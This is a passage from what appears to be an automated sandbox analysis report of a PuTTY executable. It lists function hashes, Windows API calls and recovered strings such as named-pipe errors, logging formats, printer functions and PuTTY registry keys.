                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      • Opcode ID: 8a0dd470fdcead8dddeb2970784ad091dbe112c6c0a7a92d94a8fdedb158568e
                      • Instruction ID: 9a0b6748f9492b34000ac30d320c14526f7014990d8ea5bb9308a263e31bbbb1
                      • Opcode Fuzzy Hash: 8a0dd470fdcead8dddeb2970784ad091dbe112c6c0a7a92d94a8fdedb158568e
                      • Instruction Fuzzy Hash: 10F08C73B18A8593E704CB39F8401AA2762FBA8780F648035EA4DD3368DF3CD951D708
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AsyncSelectrecv
                      • String ID:
                      • API String ID: 3881473523-0
                      • Opcode ID: f3ce5cf4d50df0b3d745acc74cdbada7605895cccbc6249d645d1e403d16cc15
                      • Instruction ID: 07ab7197cd11b972938cf7ab819fc6bb994d207c51bbfc4106663101cdede7ec
                      • Opcode Fuzzy Hash: f3ce5cf4d50df0b3d745acc74cdbada7605895cccbc6249d645d1e403d16cc15
                      • Instruction Fuzzy Hash: B3F0C216B2C18250FB30E33AF09536E6F909B59798F241038CB8C4B352CD5ED986970A
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID:
                      • API String ID: 542301482-0
                      • Opcode ID: 03de8d71a4be3953e10ae13e30a1e1ff27b4efe455a589614f809a35615d1a43
                      • Instruction ID: e432d80b52486c0dc55d7ad52aaccb52f828619245af5e921affbef511d192f5
                      • Opcode Fuzzy Hash: 03de8d71a4be3953e10ae13e30a1e1ff27b4efe455a589614f809a35615d1a43
                      • Instruction Fuzzy Hash: A7F06D22B28E4591EB10DB36E48416E7BA0FBC8B88FA14132ED4D83724DF3CD505CB04
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 993e43af5144b5df1f7e92e88d904c3feb4072d45124f6a2942c69ba0701a111
                      • Instruction ID: b07f7c41985dc7f728120063f0a1c6c6cc54e0b0c7912557c9cdee34ba649511
                      • Opcode Fuzzy Hash: 993e43af5144b5df1f7e92e88d904c3feb4072d45124f6a2942c69ba0701a111
                      • Instruction Fuzzy Hash: DF627263A2855286FBA48B3DC98837D6B91EB50764F788232D65DCB2D4DE3CEC95C304
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 46426d5d7efc5a345a0938ac86cbc428851b82a614d0deccf848203279138596
                      • Instruction ID: 6ecdef1e901066320a15bc7870dfdae56bad5b0bd50a434f76b0bd7a14d8b8cb
                      • Opcode Fuzzy Hash: 46426d5d7efc5a345a0938ac86cbc428851b82a614d0deccf848203279138596
                      • Instruction Fuzzy Hash: 62325D33615B4097DB64CF2AE58032ABBB5F748B94F244129DB9D83B94DF39E8A0D704
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef495411578315094c3b8b0b0ef82c0cbbefe29a80ec4ea727437fef7d1e84bc
                      • Instruction ID: cfdba3acfdc19d1eead021529f3c42bf97d3d8c10db60c66d5262f695c7c1659
                      • Opcode Fuzzy Hash: ef495411578315094c3b8b0b0ef82c0cbbefe29a80ec4ea727437fef7d1e84bc
                      • Instruction Fuzzy Hash: 2D02D42BD3ABD695F323473E64032A6EA14AFB72C5F10D327FEC471963AF1992415218
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6491c457c2f999092d19aac2a781b34ba13e1e847d4f134996f3fd6c7cfe067f
                      • Instruction ID: 51a02f70a96f2eeeb926a72b319c3adaaac939e272256533b1db996086d035d9
                      • Opcode Fuzzy Hash: 6491c457c2f999092d19aac2a781b34ba13e1e847d4f134996f3fd6c7cfe067f
                      • Instruction Fuzzy Hash: 59D1E423A2860296EB688F35C05057F3BA1FB66B44F744136DE4D87395DF29EC42E748
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce389f0dbad14dee4605976a16223a6dc27675f2768b1d64b873d7454b2587f6
                      • Instruction ID: adcf21fa819004e54ee99f214c8e1f1604fd718ca4f9c24a315a5a77bdda5ed8
                      • Opcode Fuzzy Hash: ce389f0dbad14dee4605976a16223a6dc27675f2768b1d64b873d7454b2587f6
                      • Instruction Fuzzy Hash: 7BD1E66BD28646A6EB248B39900437F2BA1EB46B48F340135DE5C972D5CF3DEC46E748
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3586640a44890738779c2210aa53c8a3810d9f753ae1b3ee725ba0205a4a53de
                      • Instruction ID: 9f2bc263de4d1730c713803a3453b7afd04b7cbff675da1a074c8782b13baa2b
                      • Opcode Fuzzy Hash: 3586640a44890738779c2210aa53c8a3810d9f753ae1b3ee725ba0205a4a53de
                      • Instruction Fuzzy Hash: 4A913633B3824256EA264F3996117BB5E80AF54798F25213DDE2EC77C0DE2CED05B608
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID:
                      • API String ID: 3015471070-0
                      • Opcode ID: dce5b378301aeb93486de878a6dbbf0f258c3ad3a5b23ff118a7b10539390b69
                      • Instruction ID: 8cf18afdc8a2b75c148b023d54242d296e9ecba174ab4bc00794e8ef4912b6f6
                      • Opcode Fuzzy Hash: dce5b378301aeb93486de878a6dbbf0f258c3ad3a5b23ff118a7b10539390b69
                      • Instruction Fuzzy Hash: CC91A392B3455151FE60E6329865B7B5942AF91FC4F606432CC0ECBFEACD2DE842A748
                      Similarity
                      • API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
                      • String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
                      • API String ID: 4109966220-2668247132
                      • Opcode ID: 329f361bb8f13bd28862b3555d1e71d4b298ea3fec208f4ed789b3c635bb196e
                      • Instruction ID: c779118f50d0f6ed56a19b7ba2ff6fa063f37a642641e100c5b59cc9d4f9fda9
                      • Opcode Fuzzy Hash: 329f361bb8f13bd28862b3555d1e71d4b298ea3fec208f4ed789b3c635bb196e
                      • Instruction Fuzzy Hash: 4371A437B2829296E724DB31B8446A67BA1FB58B94F604035CD4D83B54DE3CED45DF08
                      APIs
                      • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B307
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B30F
                      • WaitNamedPipeA.KERNEL32 ref: 00007FF67867B322
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B329
                        • Part of subcall function 00007FF67869B8AC: _set_error_mode.LIBCMT ref: 00007FF67869B8D3
                        • Part of subcall function 00007FF678616F90: GetCurrentProcessId.KERNEL32 ref: 00007FF678616FD0
                        • Part of subcall function 00007FF678616F90: OpenProcess.KERNEL32 ref: 00007FF678616FE2
                        • Part of subcall function 00007FF678616F90: GetLastError.KERNEL32 ref: 00007FF678617033
                        • Part of subcall function 00007FF678616F90: LocalAlloc.KERNEL32 ref: 00007FF678617058
                        • Part of subcall function 00007FF678616F90: GetLengthSid.ADVAPI32 ref: 00007FF67861708A
                        • Part of subcall function 00007FF678616F90: CopySid.ADVAPI32 ref: 00007FF6786170AE
                        • Part of subcall function 00007FF678616F90: CloseHandle.KERNEL32 ref: 00007FF6786170D4
                        • Part of subcall function 00007FF678616F90: CloseHandle.KERNEL32 ref: 00007FF6786170E4
                        • Part of subcall function 00007FF678616F90: LocalFree.KERNEL32 ref: 00007FF6786170F2
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B38E
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B394
                        • Part of subcall function 00007FF678617AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF678617B7B
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B3CE
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B3D4
                      • EqualSid.ADVAPI32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B420
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B42F
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B43A
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF67867B48B), ref: 00007FF67867B445
                      Similarity
                      • API ID: CloseErrorHandleLast$Local$Free$Process$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
                      • API String ID: 1091246219-3978821697
                      • Opcode ID: d677df9f2a73e2b24b901285e670e97e10afab5bd0461f87eb4ad6523a0a6656
                      • Instruction ID: ff48aa75064390cf98ffcb0210b34f605a917afa39a75686935369c8728e484c
                      • Opcode Fuzzy Hash: d677df9f2a73e2b24b901285e670e97e10afab5bd0461f87eb4ad6523a0a6656
                      • Instruction Fuzzy Hash: 6F516E22A38642A1FA00AB31A85827B2F61AF957A0F744135DD1EC77D5DF3CED45A708
                      APIs
                        • Part of subcall function 00007FF6786162C0: LoadLibraryA.KERNELBASE ref: 00007FF6786162E9
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACA8
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACBB
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACCE
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACE1
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861ACF4
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861AD07
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861AD1A
                      • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF67861ABC2), ref: 00007FF67861AD2D
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
                      • API String ID: 2238633743-2130675966
                      • Opcode ID: 40374bb5c3ce95447d525cfe71ef60bc5d2953ae36c32016de0dce7f197f61ea
                      • Instruction ID: e510f940b098b52507e35c59bdaa41b3c775f5ece5acbf62ceb9ec4542277183
                      • Opcode Fuzzy Hash: 40374bb5c3ce95447d525cfe71ef60bc5d2953ae36c32016de0dce7f197f61ea
                      • Instruction Fuzzy Hash: BB310D26D2DB02A0FA019731F9553673FA5AF20B81F740535C44C8A3A4DFBDE945AB5C
                      APIs
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E15
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E42
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E6F
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616E9C
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616EC9
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616EF2
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6786173AA), ref: 00007FF678616F17
                      Similarity
                      • API ID: AddressProc
                      • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
                      • API String ID: 190572456-1260934078
                      • Opcode ID: 85342a26e3eb30e5a6748582a1d3f7838cb8d28d6283a6b5bad0e46a1c599cdf
                      • Instruction ID: 6c1c823f5020e23e88fe4d9dd531f79b2f3d649a6cdec22aa0dc5cad4ced1636
                      • Opcode Fuzzy Hash: 85342a26e3eb30e5a6748582a1d3f7838cb8d28d6283a6b5bad0e46a1c599cdf
                      • Instruction Fuzzy Hash: 9841C82EE3EB43B5FA558B34A8543762EA2AF54740F740435D40DCA6A1EF2CED44BB18
                      Similarity
                      • API ID: LocalTimewcsftime
                      • String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
                      • API String ID: 2400502282-2889948183
                      Similarity
                      • API ID: CommState
                      • String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$Invalid number of stop bits (need 1, 1.5 or 2)
                      • API String ID: 4071006776-1037083001
                      APIs
                        • Part of subcall function 00007FF67869E168: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67869E19C
                        • Part of subcall function 00007FF678626500: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00007FF6785FB996), ref: 00007FF67862651C
                      • wcsftime.LIBCMT ref: 00007FF6785FBD08
                      Similarity
                      • API ID: LocalTime_invalid_parameter_noinfowcsftime
                      • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
                      • API String ID: 42641226-759394250
                      Similarity
                      • API ID: Cursor$Window$InfoLongMenuMessageMonitorPopupProcSendShowTrackZoomed
                      • String ID: (
                      • API String ID: 1195453808-3887548279
                      Similarity
                      • API ID: htonl$ErrorLastgetaddrinfogethostbynameinet_addr
                      • String ID: Host does not exist$Host not found$Network is down
                      • API String ID: 106626933-2906891963
                      Similarity
                      • API ID: CreateFileInstanceModuleName_invalid_parameter_noinfo
                      • String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/jump-list.c$Connect to PuTTY session '$Pageant.exe$Run %.*s$appname
                      • API String ID: 3863850918-4263420936
                      APIs
                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF6786A28A0,?,?,00000000,00007FF6786A67C0,?,?,00000003,00007FF67869837D), ref: 00007FF6786A2E67
                      • GetProcAddress.KERNEL32(?,00000000,?,00007FF6786A28A0,?,?,00000000,00007FF6786A67C0,?,?,00000003,00007FF67869837D), ref: 00007FF6786A2E73
                      Similarity
                      • API ID: AddressFreeLibraryProc
                      • String ID: MZx$api-ms-$ext-ms-
                      • API String ID: 3013587201-2431898299
                      Similarity
                      • API ID: ItemText
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
                      • API String ID: 3367045223-1831221297
                      Similarity
                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                      • String ID:
                      • API String ID: 1330151763-0
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID: 0$f$p$p
                      • API String ID: 3215553584-1202675169
                      Similarity
                      • API ID: CapsChooseDeviceFontRelease
                      • String ID: h
                      • API String ID: 554219020-2439710439
                      Similarity
                      • API ID: htons$getpeernameinet_ntoainet_ntop
                      • String ID: %s:%d$[%s]:%d
                      • API String ID: 1060964792-2542140192
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      • Opcode ID: b8349ec93c4dddec6680e4932faa4de2be99d3b4fc5e745421a728c7658fe9e4
                      • Instruction ID: 3c3ebb8a4836dc25ab36365b6fef416889a9b863b67155cf4e5ef9ac58426430
                      • Opcode Fuzzy Hash: b8349ec93c4dddec6680e4932faa4de2be99d3b4fc5e745421a728c7658fe9e4
                      • Instruction Fuzzy Hash: E931AF23B2D68689FA608B30E4853BA2B91EF94750F644034CA9DC6694CF7CFD85EB14
                      APIs
                        • Part of subcall function 00007FF67860DA70: GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC25
                        • Part of subcall function 00007FF67860DA70: GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC3B
                        • Part of subcall function 00007FF67860DA70: GetWindowsDirectoryA.KERNEL32 ref: 00007FF67860DCA5
                        • Part of subcall function 00007FF6785FAA80: CoCreateInstance.OLE32(?,?,?,?,?,?,00007FF67860E0A2), ref: 00007FF6785FAAB3
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860E0D5
                      • RegDeleteKeyA.ADVAPI32 ref: 00007FF67860E10C
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860E121
                        • Part of subcall function 00007FF67860E190: RegDeleteKeyA.ADVAPI32 ref: 00007FF67860E1B6
                        • Part of subcall function 00007FF67860E190: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF67860E0D2), ref: 00007FF67860E200
                      • RegDeleteKeyA.ADVAPI32 ref: 00007FF67860E16B
                      Strings
                      Similarity
                      • API ID: Close$Delete$CreateEnvironmentVariable$DirectoryInstanceWindows
                      • String ID: Software$Software\SimonTatham$Software\SimonTatham\PuTTY
                      • API String ID: 1055326402-1491235443
                      • Opcode ID: 81ef892001f2c2f1c0cb7cd0e59f28a03b7942c1b0957569705c6f07a305703b
                      • Instruction ID: 6ecb25de97927b5cb10dbfe561937d776d71513f5d6ec0a4af8f48f8a5f34bb6
                      • Opcode Fuzzy Hash: 81ef892001f2c2f1c0cb7cd0e59f28a03b7942c1b0957569705c6f07a305703b
                      • Instruction Fuzzy Hash: 7021D42AE3D11620FD19A77565013FB1A904F48BA4F704234DD1E8A7CBEE2CAC45E35C
                      APIs
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID:
                      • API String ID: 3015471070-0
                      • Opcode ID: 06f3538c602ea54299b76f3686f6f10951f03e849c5c96e174d474a1f6d0ed2f
                      • Instruction ID: c6430b6f2c535257e992447bb882d210d589fb5ac12545cacd1d2a984ee39341
                      • Opcode Fuzzy Hash: 06f3538c602ea54299b76f3686f6f10951f03e849c5c96e174d474a1f6d0ed2f
                      • Instruction Fuzzy Hash: 4F21D622B245605AE3709B17BD10FB79695BB8AFC8F184125BC8D47F84CE7DCB069B48
